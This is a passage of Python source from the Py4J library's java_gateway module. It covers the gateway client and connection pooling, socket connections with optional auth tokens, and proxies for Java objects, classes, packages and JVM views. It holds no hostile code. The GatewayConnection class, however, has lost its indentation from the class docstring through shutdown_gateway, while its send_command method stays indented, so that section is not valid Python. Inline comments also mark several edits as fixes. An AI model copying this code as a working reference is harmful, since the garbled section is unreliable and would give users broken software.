    Special proxies such as the entry point are never removed.

    Note: even though this function starts with _garbage_collect,
    it is not called withing a weakref lambda. This is only a private function.

    :return: True if the proxy was removed, False otherwise.
    """
    if proxy_id == proto.ENTRY_POINT_OBJECT_ID:
        return False
    try:
        del pool[proxy_id]
    except KeyError:
        logger.warning(
            "Tried to garbage collect non existing python proxy {0}"
            .format(proxy_id))
        return False
    return True
class OutputConsumer(CompatThread):
    """Thread that consumes output
    """

    def __init__(self, redirect, stream, *args, **kwargs):
        super(OutputConsumer, self).__init__(*args, **kwargs)
        self.redirect = redirect
        self.stream = stream
        # Pick the sink with the same priority as the original sequential
        # overrides: file-like object wins over deque, which wins over Queue.
        if hasattr2(redirect, "write"):
            self.redirect_func = self._pipe_fd
        elif isinstance(redirect, deque):
            self.redirect_func = self._pipe_deque
        elif isinstance(redirect, Queue):
            self.redirect_func = self._pipe_queue

    def _pipe_queue(self, line):
        self.redirect.put(line)

    def _pipe_deque(self, line):
        self.redirect.appendleft(line)

    def _pipe_fd(self, line):
        self.redirect.write(line)

    def run(self):
        # Forward each decoded line until the stream reaches EOF.
        for raw_line in iter(self.stream.readline, b""):
            self.redirect_func(smart_decode(raw_line))
class ProcessConsumer(CompatThread):
    """Thread that ensures process stdout and stderr are properly closed.
    """

    def __init__(self, proc, closable_list, *args, **kwargs):
        super(ProcessConsumer, self).__init__(*args, **kwargs)
        self.proc = proc
        # We don't care if it contains queues or deques, quiet_close will
        # just ignore them. Keep the caller's list (no copy) when provided.
        self.closable_list = closable_list if closable_list else []

    def run(self):
        # Block until the child process terminates, then release its pipes
        # and any extra redirect targets.
        self.proc.wait()
        quiet_close(self.proc.stdout)
        quiet_close(self.proc.stderr)
        for item in self.closable_list:
            quiet_close(item)
class GatewayParameters(object):
    """Wrapper class that contains all parameters that can be passed to
    configure a `JavaGateway`
    """

    def __init__(
            self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
            auto_close=True, auto_convert=False, eager_load=False,
            ssl_context=None, enable_memory_management=True,
            read_timeout=None, auth_token=None):
        """
        :param address: the address to which the client will request a
            connection. If you're passing a `SSLContext` with
            `check_hostname=True` then this address must match
            (one of) the hostname(s) in the certificate the gateway
            server presents.

        :param port: the port to which the client will request a connection.
            Default is 25333.

        :param auto_field: if `False`, each object accessed through this
            gateway won"t try to lookup fields (they will be accessible only by
            calling get_field). If `True`, fields will be automatically looked
            up, possibly hiding methods of the same name and making method
            calls less efficient.

        :param auto_close: if `True`, the connections created by the client
            close the socket when they are garbage collected.

        :param auto_convert: if `True`, try to automatically convert Python
            objects like sequences and maps to Java Objects. Default value is
            `False` to improve performance and because it is still possible to
            explicitly perform this conversion.

        :param eager_load: if `True`, the gateway tries to connect to the JVM
            by calling System.currentTimeMillis. If the gateway cannot connect
            to the JVM, it shuts down itself and raises an exception.

        :param ssl_context: if not None, SSL connections will be made using
            this SSLContext

        :param enable_memory_management: if True, tells the Java side when a
            JavaObject (reference to an object on the Java side) is garbage
            collected on the Python side.

        :param read_timeout: if > 0, sets a timeout in seconds after
            which the socket stops waiting for a response from the Java side.

        :param auth_token: if provided, an authentication token that clients
            must provide to the server when connecting.
        """
        self.address = address
        self.port = port
        self.auto_field = auto_field
        self.auto_close = auto_close
        self.auto_convert = auto_convert
        self.eager_load = eager_load
        self.ssl_context = ssl_context
        self.enable_memory_management = enable_memory_management
        self.read_timeout = read_timeout
        # Escaped so the token can travel on a single protocol line.
        self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
    """Wrapper class that contains all parameters that can be passed to
    configure a `CallbackServer`
    """

    def __init__(
            self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
            daemonize=False, daemonize_connections=False, eager_load=True,
            ssl_context=None,
            accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
            read_timeout=None, propagate_java_exceptions=False,
            auth_token=None):
        """
        :param address: the address to which the client will request a
            connection

        :param port: the port to which the client will request a connection.
            Default is 25333.

        :param daemonize: If `True`, will set the daemon property of the server
            thread to True. The callback server will exit automatically if all
            the other threads exit.

        :param daemonize_connections: If `True`, callback server connections
            are executed in daemonized threads and will not block the exit of a
            program if non daemonized threads are finished.

        :param eager_load: If `True`, the callback server is automatically
            started when the JavaGateway is created.

        :param ssl_context: if not None, the SSLContext's certificate will be
            presented to callback connections.

        :param accept_timeout: if > 0, sets a timeout in seconds after which
            the callbackserver stops waiting for a connection, sees if the
            callback server should shut down, and if not, wait again for a
            connection. The default is 5 seconds: this roughly means that
            if can take up to 5 seconds to shut down the callback server.

        :param read_timeout: if > 0, sets a timeout in seconds after
            which the socket stops waiting for a call or command from the
            Java side.

        :param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
            by a Python callback will cause the nested `java_exception` to be
            thrown on the Java side. If `False`, the `Py4JJavaError` will
            manifest as a `Py4JException` on the Java side, just as with any
            other kind of Python exception. Setting this option is useful if
            you need to implement a Java interface where the user of the
            interface has special handling for specific Java exception types.

        :param auth_token: if provided, an authentication token that clients
            must provide to the server when connecting.
        """
        self.address = address
        self.port = port
        self.daemonize = daemonize
        self.daemonize_connections = daemonize_connections
        self.eager_load = eager_load
        self.ssl_context = ssl_context
        if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
            # This is to support deprecated function call...
            # TODO Remove "DEFAULT" once we remove the deprecated function
            # call.
            accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
        self.accept_timeout = accept_timeout
        self.read_timeout = read_timeout
        self.propagate_java_exceptions = propagate_java_exceptions
        # Escaped so the token can travel on a single protocol line.
        self.auth_token = escape_new_line(auth_token)
class DummyRLock(object):
    """No-op drop-in replacement for a re-entrant lock.

    Exposes the same interface as ``threading.RLock`` (including context
    manager use) but performs no synchronization.
    """

    def __init__(self):
        pass

    def acquire(self, blocking=1):
        pass

    def release(self):
        pass

    def __enter__(self):
        pass

    def __exit__(self, type, value, tb):
        pass
class GatewayConnectionGuard(object):
    """Context manager owning a connection borrowed from a client.

    On a clean exit the connection is recycled into the client's pool;
    if the block raised, the connection is closed instead.
    """

    def __init__(self, client, connection):
        self._client = client
        self._connection = connection

    def __enter__(self):
        return self

    def read(self, hint=-1):
        """Reads from the underlying connection's stream."""
        return self._connection.stream.read(hint)

    def __exit__(self, type, value, traceback):
        if value is not None:
            # An exception occurred: the connection state is unknown,
            # drop it.
            self._connection.close()
        else:
            self._client._give_back_connection(self._connection)
class GatewayClient(object):
    """Responsible for managing connections to the JavaGateway.

    This implementation is thread-safe and connections are created on-demand.
    This means that Py4J-Python can be accessed by multiple threads and
    messages are sent to and processed concurrently by the Java Gateway.

    When creating a custom :class:`JavaGateway`, it is recommended to pass an
    instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
    both have the same interface, but the client supports multiple threads and
    connections, which is essential when using callbacks. """

    def __init__(
            self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
            auto_close=True, gateway_property=None,
            ssl_context=None, gateway_parameters=None):
        """
        :param gateway_parameters: the set of parameters used to configure the
            GatewayClient.

        :param gateway_property: used to keep gateway preferences without a
            cycle with the gateway
        """
        if address != DEFAULT_ADDRESS:
            deprecated("GatewayClient.address", "1.0", "GatewayParameters")
        if port != DEFAULT_PORT:
            deprecated("GatewayClient.port", "1.0", "GatewayParameters")
        if not gateway_parameters:
            gateway_parameters = GatewayParameters(
                address=address, port=port, auto_close=auto_close,
                ssl_context=ssl_context)
        self.gateway_parameters = gateway_parameters
        self.address = gateway_parameters.address
        self.port = gateway_parameters.port
        self.is_connected = True
        self.auto_close = gateway_parameters.auto_close
        self.gateway_property = gateway_property
        self.ssl_context = gateway_parameters.ssl_context
        # Pool of idle GatewayConnection instances reused across calls.
        self.deque = deque()

    def garbage_collect_object(self, target_id):
        """Tells the Java side that there is no longer a reference to this
        JavaObject on the Python side.
        """
        # Never send a DEL command for the special singleton object ids.
        if target_id != proto.ENTRY_POINT_OBJECT_ID and\
                target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
                self.is_connected:
            try:
                self.send_command(
                    proto.MEMORY_COMMAND_NAME +
                    proto.MEMORY_DEL_SUBCOMMAND_NAME +
                    target_id +
                    "\ne\n")
            except Exception:
                logger.debug("Exception while garbage collecting an object",
                             exc_info=True)

    def _get_connection(self):
        """Returns a pooled connection, creating a new one if the pool
        is empty.

        :raises Py4JNetworkError: if the client is no longer connected.
        """
        if not self.is_connected:
            raise Py4JNetworkError("Gateway is not connected.")
        try:
            connection = self.deque.pop()
        except IndexError:
            connection = self._create_connection()
        return connection

    def _create_connection(self):
        """Creates and starts a new connection to the Java side."""
        connection = GatewayConnection(
            self.gateway_parameters, self.gateway_property)
        connection.start()
        return connection

    def _give_back_connection(self, connection):
        """Returns a healthy connection to the pool for reuse."""
        try:
            self.deque.append(connection)
        except Exception:
            logger.warning(
                "Exception while giving back connection", exc_info=True)

    def shutdown_gateway(self):
        """Sends a shutdown command to the gateway. This will close the
        gateway server: all active connections will be closed. This may
        be useful if the lifecycle of the Java program must be tied to
        the Python program.
        """
        connection = self._get_connection()
        try:
            connection.shutdown_gateway()
            self.close()
            self.is_connected = False
        except Py4JNetworkError:
            # The pooled connection was stale: retry with a fresh one.
            logger.debug("Error while shutting down gateway.", exc_info=True)
            self.shutdown_gateway()

    def send_command(self, command, retry=True, binary=False):
        """Sends a command to the JVM. This method is not intended to be
        called directly by Py4J users. It is usually called by
        :class:`JavaMember` instances.

        :param command: the `string` command to send to the JVM. The command
            must follow the Py4J protocol.

        :param retry: if `True`, the GatewayClient tries to resend a message
            if it fails.

        :param binary: if `True`, we won't wait for a Py4J-protocol response
            from the other end; we'll just return the raw connection to the
            caller. The caller becomes the owner of the connection, and is
            responsible for closing the connection (or returning it this
            `GatewayClient` pool using `_give_back_connection`).

        :rtype: the `string` answer received from the JVM (The answer follows
            the Py4J protocol). The guarded `GatewayConnection` is also
            returned if `binary` is `True`.
        """
        connection = self._get_connection()
        try:
            response = connection.send_command(command)
            if binary:
                return response, self._create_connection_guard(connection)
            elif is_fatal_error(response):
                connection.close(False)
            else:
                self._give_back_connection(connection)
        except Py4JNetworkError as pne:
            if connection:
                reset = False
                if isinstance(pne.cause, socket.timeout):
                    # A timeout may leave unread data on the wire; close
                    # with RST instead of a normal shutdown.
                    reset = True
                connection.close(reset)
            if self._should_retry(retry, connection, pne):
                # Consistency fix: use the module-level ``logger`` (as the
                # rest of this module does) instead of the root logger via
                # ``logging.info``, which also implicitly configured the
                # root logger.
                logger.info("Exception while sending command.", exc_info=True)
                response = self.send_command(command, binary=binary)
            else:
                logger.exception(
                    "Exception while sending command.")
                response = proto.ERROR
        return response

    def _create_connection_guard(self, connection):
        """Wraps ``connection`` in a guard that owns its lifecycle."""
        return GatewayConnectionGuard(self, connection)

    def _should_retry(self, retry, connection, pne=None):
        # Only retry when the failure happened while sending: the command
        # was then never processed by the Java side, so a resend is safe.
        return pne and pne.when == proto.ERROR_ON_SEND

    def close(self):
        """Closes all currently opened connections.

        This operation is not thread safe and is only a best effort strategy
        to close active connections.

        All connections are guaranteed to be closed only if no other thread
        is accessing the client and no call is pending.
        """
        size = len(self.deque)
        for _ in range(0, size):
            try:
                connection = self.deque.pop()
                quiet_close(connection)
            except IndexError:
                pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
# Sent shut down before attempting to close a stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
    def send_command(self, command):
        """Sends a command to the JVM. This method is not intended to be
        called directly by Py4J users: it is usually called by JavaMember
        instances.

        :param command: the `string` command to send to the JVM. The command
            must follow the Py4J protocol.

        :rtype: the `string` answer received from the JVM (The answer follows
            the Py4J protocol).

        :raises Py4JNetworkError: if the command could not be sent or a valid
            answer could not be received.
        """
        logger.debug("Command to send: {0}".format(command))
        try:
            # Write will only fail if remote is closed for large payloads or
            # if it sent a RST packet (SO_LINGER)
            self.socket.sendall(command.encode("utf-8"))
        except Exception as e:
            logger.info("Error while sending.", exc_info=True)
            raise Py4JNetworkError(
                "Error while sending", e, proto.ERROR_ON_SEND)
        try:
            # readline() includes the trailing newline; [:-1] strips it.
            answer = smart_decode(self.stream.readline()[:-1])
            logger.debug("Answer received: {0}".format(answer))
            if answer.startswith(proto.RETURN_MESSAGE):
                answer = answer[1:]
            # Happens when the other end is dead. There might be an empty
            # answer before the socket raises an error.
            if answer.strip() == "":
                raise Py4JNetworkError("Answer from Java side is empty")
            return answer
        except Exception as e:
            logger.info("Error while receiving.", exc_info=True)
            raise Py4JNetworkError(
                "Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
    """Represents a member (i.e., method) of a :class:`JavaObject`. For now,
    only methods are supported. Fields are retrieved directly and are not
    contained in a JavaMember.
    """

    def __init__(self, name, container, target_id, gateway_client):
        # name: the Java method name this member proxies.
        # container: the owning JavaObject (None for static members).
        # target_id: id of the target object/class on the JVM side.
        self.name = name
        self.container = container
        self.target_id = target_id
        self.gateway_client = gateway_client
        # Pre-built prefix shared by every command this member sends.
        self.command_header = self.target_id + "\n" + self.name + "\n"
        self.pool = self.gateway_client.gateway_property.pool
        self.converters = self.gateway_client.converters
        self._gateway_doc = None

    @property
    def __doc__(self):
        # The __doc__ string is used by IPython/PyDev/etc to generate
        # help string, therefore provide useful help
        if self._gateway_doc is None:
            self._gateway_doc = gateway_help(
                self.gateway_client, self, display=False)
        return self._gateway_doc

    def _get_args(self, args):
        """Runs non-JavaObject arguments through the registered converters.

        Returns ``(new_args, temp_args)``: `new_args` is the full argument
        list to send, and `temp_args` holds converted objects that must be
        detached (freed on the Java side) after the call completes.
        """
        temp_args = []
        new_args = []
        for arg in args:
            if not isinstance(arg, JavaObject):
                for converter in self.gateway_client.converters:
                    if converter.can_convert(arg):
                        temp_arg = converter.convert(arg, self.gateway_client)
                        temp_args.append(temp_arg)
                        new_args.append(temp_arg)
                        break
                else:
                    # for/else: no converter accepted the value, send as-is.
                    new_args.append(arg)
            else:
                new_args.append(arg)
        return (new_args, temp_args)

    def _build_args(self, *args):
        """Encodes the call arguments as a Py4J command fragment."""
        if self.converters is not None and len(self.converters) > 0:
            (new_args, temp_args) = self._get_args(args)
        else:
            new_args = args
            temp_args = []
        args_command = "".join(
            [get_command_part(arg, self.pool) for arg in new_args])
        return args_command, temp_args

    def stream(self, *args):
        """
        Call the method using the 'binary' protocol.

        :rtype: The `GatewayConnection` that the call command was sent to.
        """
        args_command, temp_args = self._build_args(*args)
        command = proto.STREAM_COMMAND_NAME +\
            self.command_header +\
            args_command +\
            proto.END_COMMAND_PART
        answer, connection = self.gateway_client.send_command(
            command, binary=True)
        # parse the return value to throw an exception if necessary
        get_return_value(
            answer, self.gateway_client, self.target_id, self.name)
        for temp_arg in temp_args:
            temp_arg._detach()
        return connection

    def __call__(self, *args):
        """Invokes the remote method with `args` and returns the converted
        result (may raise the Java-side exception via get_return_value)."""
        args_command, temp_args = self._build_args(*args)
        command = proto.CALL_COMMAND_NAME +\
            self.command_header +\
            args_command +\
            proto.END_COMMAND_PART
        answer = self.gateway_client.send_command(command)
        return_value = get_return_value(
            answer, self.gateway_client, self.target_id, self.name)
        # Converted temporaries are no longer needed on the Java side.
        for temp_arg in temp_args:
            temp_arg._detach()
        return return_value
class JavaObject(object):
    """Represents a Java object from which you can call methods or access
    fields."""

    def __init__(self, target_id, gateway_client):
        """
        :param target_id: the identifier of the object on the JVM side. Given
            by the JVM.

        :param gateway_client: the gateway client used to communicate with
            the JVM.
        """
        self._target_id = target_id
        self._gateway_client = gateway_client
        self._auto_field = gateway_client.gateway_property.auto_field
        # Cache of JavaMember proxies, keyed by member name.
        self._methods = {}
        self._field_names = set()
        self._fully_populated = False
        self._gateway_doc = None

        # Finalizer key must be unique per (gateway address, port, object id).
        key = smart_decode(self._gateway_client.address) +\
            smart_decode(self._gateway_client.port) +\
            self._target_id

        if self._gateway_client.gateway_property.enable_memory_management:
            # The `_garbage_collect_object and ...` guard avoids a NameError
            # when the module is being torn down at interpreter exit.
            value = weakref.ref(
                self,
                lambda wr, cc=self._gateway_client, id=self._target_id:
                _garbage_collect_object and _garbage_collect_object(cc, id))
            ThreadSafeFinalizer.add_finalizer(key, value)

    def _detach(self):
        # Explicitly tells the JVM this Python proxy no longer references
        # the remote object.
        _garbage_collect_object(self._gateway_client, self._target_id)

    def _get_object_id(self):
        return self._target_id

    @property
    def __doc__(self):
        # The __doc__ string is used by IPython/PyDev/etc to generate
        # help string, therefore provide useful help
        if self._gateway_doc is None:
            self._gateway_doc = gateway_help(
                self._gateway_client, self, display=False)
        return self._gateway_doc

    def __getattr__(self, name):
        """Resolves `name` to a field value (when auto_field is on) or to a
        cached JavaMember proxy for the remote method."""
        if name == "__call__":
            # Provide an explicit definition for __call__ so that a JavaMember
            # does not get created for it. This serves two purposes:
            # 1) IPython (and others?) stop showing incorrect help indicating
            # that this is callable
            # 2) A TypeError(object not callable) is raised if someone does try
            # to call here
            raise AttributeError

        if name not in self._methods:
            if (self._auto_field):
                (is_field, return_value) = self._get_field(name)
                if (is_field):
                    self._field_names.add(name)
                    return return_value
            # Theoretically, not thread safe, but the worst case scenario is
            # cache miss or double overwrite of the same method...
            self._methods[name] = JavaMember(
                name, self, self._target_id, self._gateway_client)

        # The name is a method
        return self._methods[name]

    def __dir__(self):
        self._populate_fields()
        return list(set(self._methods.keys()) | self._field_names)

    def _populate_fields(self):
        """Fetches all field and method names from the JVM once, so that
        __dir__ can list them (used for interactive completion)."""
        # Theoretically, not thread safe, but the worst case scenario is
        # cache miss or double overwrite of the same method...
        if not self._fully_populated:
            if self._auto_field:
                command = proto.DIR_COMMAND_NAME +\
                    proto.DIR_FIELDS_SUBCOMMAND_NAME +\
                    self._target_id + "\n" +\
                    proto.END_COMMAND_PART
                answer = self._gateway_client.send_command(command)
                return_value = get_return_value(
                    answer, self._gateway_client, self._target_id, "__dir__")
                self._field_names.update(return_value.split("\n"))

            command = proto.DIR_COMMAND_NAME +\
                proto.DIR_METHODS_SUBCOMMAND_NAME +\
                self._target_id + "\n" +\
                proto.END_COMMAND_PART
            answer = self._gateway_client.send_command(command)
            return_value = get_return_value(
                answer, self._gateway_client, self._target_id, "__dir__")
            names = return_value.split("\n")
            for name in names:
                if name not in self._methods:
                    self._methods[name] = JavaMember(
                        name, self, self._target_id, self._gateway_client)
            self._fully_populated = True

    def _get_field(self, name):
        """Asks the JVM for field `name`; returns (is_field, value)."""
        command = proto.FIELD_COMMAND_NAME +\
            proto.FIELD_GET_SUBCOMMAND_NAME +\
            self._target_id + "\n" +\
            name + "\n" +\
            proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
            return (False, None)
        else:
            return_value = get_return_value(
                answer, self._gateway_client, self._target_id, name)
            return (True, return_value)

    def __eq__(self, other):
        # Delegates to Java's equals() when comparing two Java proxies;
        # otherwise lets the other operand decide.
        if other is None:
            return False
        elif (hasattr2(other, "_get_object_id")):
            return self.equals(other)
        else:
            return other.__eq__(self)

    def __hash__(self):
        # Mirrors __eq__: uses the Java-side hashCode() (remote call).
        return self.hashCode()

    def __str__(self):
        # Remote call to Java's toString().
        return self.toString()

    def __repr__(self):
        # For now...
        return "JavaObject id=" + self._target_id
class JavaClass(object):
    """A `JavaClass` represents a Java Class from which static members can be
    retrieved. `JavaClass` instances are also needed to initialize an array.

    Usually, `JavaClass` are not initialized using their constructor, but
    they are created while accessing the `jvm` property of a gateway, e.g.,
    `gateway.jvm.java.lang.String`.
    """

    def __init__(self, fqn, gateway_client):
        # fqn: fully qualified name of the Java class,
        # e.g. "java.lang.String".
        self._fqn = fqn
        self._gateway_client = gateway_client
        self._pool = self._gateway_client.gateway_property.pool
        self._command_header = fqn + "\n"
        self._converters = self._gateway_client.converters
        self._gateway_doc = None
        # Lazily-filled cache of static member names (see __dir__).
        self._statics = None

    @property
    def __doc__(self):
        # The __doc__ string is used by IPython/PyDev/etc to generate
        # help string, therefore provide useful help
        if self._gateway_doc is None:
            self._gateway_doc = gateway_help(
                self._gateway_client, self, display=False)
        return self._gateway_doc

    def __dir__(self):
        # Theoretically, not thread safe, but the worst case scenario is
        # cache miss or double overwrite of the same method...
        if self._statics is None:
            command = proto.DIR_COMMAND_NAME +\
                proto.DIR_STATIC_SUBCOMMAND_NAME +\
                self._fqn + "\n" +\
                proto.END_COMMAND_PART
            answer = self._gateway_client.send_command(command)
            return_value = get_return_value(
                answer, self._gateway_client, self._fqn, "__dir__")
            self._statics = return_value.split("\n")
        # Return a copy so callers cannot mutate the cache.
        return self._statics[:]

    @property
    def _java_lang_class(self):
        """Gets the java.lang.Class of the current JavaClass. This is
        equivalent to calling .class in Java.
        """
        command = proto.REFLECTION_COMMAND_NAME +\
            proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
            self._fqn + "\n" + proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        if len(answer) > 1 and answer[0] == proto.SUCCESS:
            return get_return_value(
                answer, self._gateway_client, self._fqn, "_java_lang_class")
        else:
            raise Py4JError(
                "{0} does not exist in the JVM".format(self._fqn))

    def __getattr__(self, name):
        """Resolves `name` to a static method, a nested class, or a static
        field value by asking the JVM."""
        if name in ["__str__", "__repr__"]:
            raise AttributeError

        command = proto.REFLECTION_COMMAND_NAME +\
            proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
            self._fqn + "\n" +\
            name + "\n" +\
            proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        if len(answer) > 1 and answer[0] == proto.SUCCESS:
            if answer[1] == proto.METHOD_TYPE:
                return JavaMember(
                    name, None, proto.STATIC_PREFIX + self._fqn,
                    self._gateway_client)
            elif answer[1].startswith(proto.CLASS_TYPE):
                # Nested class: Java separates outer/inner names with "$".
                return JavaClass(
                    self._fqn + "$" + name, self._gateway_client)
            else:
                return get_return_value(
                    answer, self._gateway_client, self._fqn, name)
        else:
            raise Py4JError(
                "{0}.{1} does not exist in the JVM".format(self._fqn, name))

    def _get_args(self, args):
        # Same converter logic as JavaMember._get_args (see TODO in __call__).
        temp_args = []
        new_args = []
        for arg in args:
            if not isinstance(arg, JavaObject):
                for converter in self._converters:
                    if converter.can_convert(arg):
                        temp_arg = converter.convert(arg, self._gateway_client)
                        temp_args.append(temp_arg)
                        new_args.append(temp_arg)
                        break
                else:
                    # for/else: no converter matched, pass the value through.
                    new_args.append(arg)
            else:
                new_args.append(arg)
        return (new_args, temp_args)

    def __call__(self, *args):
        """Invokes the Java constructor and returns the new JavaObject."""
        # TODO Refactor to use a mixin shared by JavaMember and JavaClass
        if self._converters is not None and len(self._converters) > 0:
            (new_args, temp_args) = self._get_args(args)
        else:
            new_args = args
            temp_args = []

        args_command = "".join(
            [get_command_part(arg, self._pool) for arg in new_args])

        command = proto.CONSTRUCTOR_COMMAND_NAME +\
            self._command_header +\
            args_command +\
            proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        return_value = get_return_value(
            answer, self._gateway_client, None, self._fqn)

        # Converted temporaries are no longer needed on the Java side.
        for temp_arg in temp_args:
            temp_arg._detach()

        return return_value
class UserHelpAutoCompletion(object):
    """
    Type a package name or a class name.

    For example with a JVMView called view:
    >>> o = view.Object() # create a java.lang.Object
    >>> random = view.jvm.java.util.Random() # create a java.util.Random

    The default JVMView is in the gateway and is called:
    >>> gateway.jvm

    By default, java.lang.* is available in the view. To
    add additional Classes/Packages, do:
    >>> from py4j.java_gateway import java_import
    >>> java_import(gateway.jvm, "com.example.Class1")
    >>> instance = gateway.jvm.Class1()

    Package and class completions are only available for
    explicitly imported Java classes. For example, if you
    java_import(gateway.jvm, "com.example.Class1")
    then Class1 will appear in the completions.
    """
    # Placeholder name returned by __dir__ of JVMView/JavaPackage so that
    # interactive completion shows this hint instead of an empty list;
    # accessing the attribute returns this class (whose docstring above is
    # the help text shown to the user).
    KEY = "<package or class name>"
class JavaPackage(object):
    """A `JavaPackage` represents part of a Java package from which Java
    classes can be accessed.

    Usually, `JavaPackage` are not initialized using their constructor, but
    they are created while accessing the `jvm` property of a gateway, e.g.,
    `gateway.jvm.java.lang`.
    """

    def __init__(self, fqn, gateway_client, jvm_id=None):
        """
        :param fqn: the (partial) fully qualified name of the package,
            e.g., "java.lang".
        :param gateway_client: the gateway client used to communicate with
            the JVM.
        :param jvm_id: the id of the JVM view this package was resolved
            through. Defaults to the default JVM view id.
        """
        self._fqn = fqn
        self._gateway_client = gateway_client
        # Bug fix: the default was previously assigned and then always
        # overwritten with jvm_id (None), so _jvm_id ended up None instead
        # of the default JVM view id.
        if jvm_id is None:
            self._jvm_id = proto.DEFAULT_JVM_ID
        else:
            self._jvm_id = jvm_id

    def __dir__(self):
        # Packages cannot be enumerated cheaply; show the completion hint.
        return [UserHelpAutoCompletion.KEY]

    def __getattr__(self, name):
        """Resolves `name` as a sub-package or a class of this package by
        asking the JVM.

        :raises Py4JError: if `name` is neither a package nor a class, or
            if an attempt is made to call the package itself.
        """
        if name == UserHelpAutoCompletion.KEY:
            return UserHelpAutoCompletion

        if name in ["__str__", "__repr__"]:
            raise AttributeError

        if name == "__call__":
            raise Py4JError("Trying to call a package.")

        new_fqn = self._fqn + "." + name
        command = proto.REFLECTION_COMMAND_NAME +\
            proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
            new_fqn + "\n" +\
            self._jvm_id + "\n" +\
            proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        if answer == proto.SUCCESS_PACKAGE:
            return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
        elif answer.startswith(proto.SUCCESS_CLASS):
            return JavaClass(
                answer[proto.CLASS_FQN_START:], self._gateway_client)
        else:
            raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
    """A `JVMView` allows access to the Java Virtual Machine of a
    `JavaGateway`.

    This can be used to reference static members (fields and methods) and
    to call constructors.
    """

    def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
        """
        :param gateway_client: the gateway client used to communicate with
            the JVM.
        :param jvm_name: the name of this view.
        :param id: the id of this view on the Java side (mutually exclusive
            with jvm_object).
        :param jvm_object: the JavaObject backing this view on the Java side
            (mutually exclusive with id).
        """
        self._gateway_client = gateway_client
        self._jvm_name = jvm_name
        if id is not None:
            self._id = id
        elif jvm_object is not None:
            self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
            # So that both JVMView instances (on Python and Java) have the
            # same lifecycle. Theoretically, JVMView could inherit from
            # JavaObject, but I would like to avoid the use of reflection
            # for regular Py4J classes.
            self._jvm_object = jvm_object
        # (sequence id returned by the JVM, cached list of importable names)
        self._dir_sequence_and_cache = (None, [])

    def __dir__(self):
        command = proto.DIR_COMMAND_NAME +\
            proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
            self._id + "\n" +\
            get_command_part(self._dir_sequence_and_cache[0]) +\
            proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        # NOTE(review): JVMView never assigns `_fqn`, so this attribute
        # access falls through to __getattr__ and triggers a spurious
        # reflection round-trip — looks like a latent bug; verify against
        # upstream py4j before changing.
        return_value = get_return_value(
            answer, self._gateway_client, self._fqn, "__dir__")
        if return_value is not None:
            result = return_value.split("\n")
            # Theoretically, not thread safe, but the worst case scenario is
            # cache miss or double overwrite of the same method...
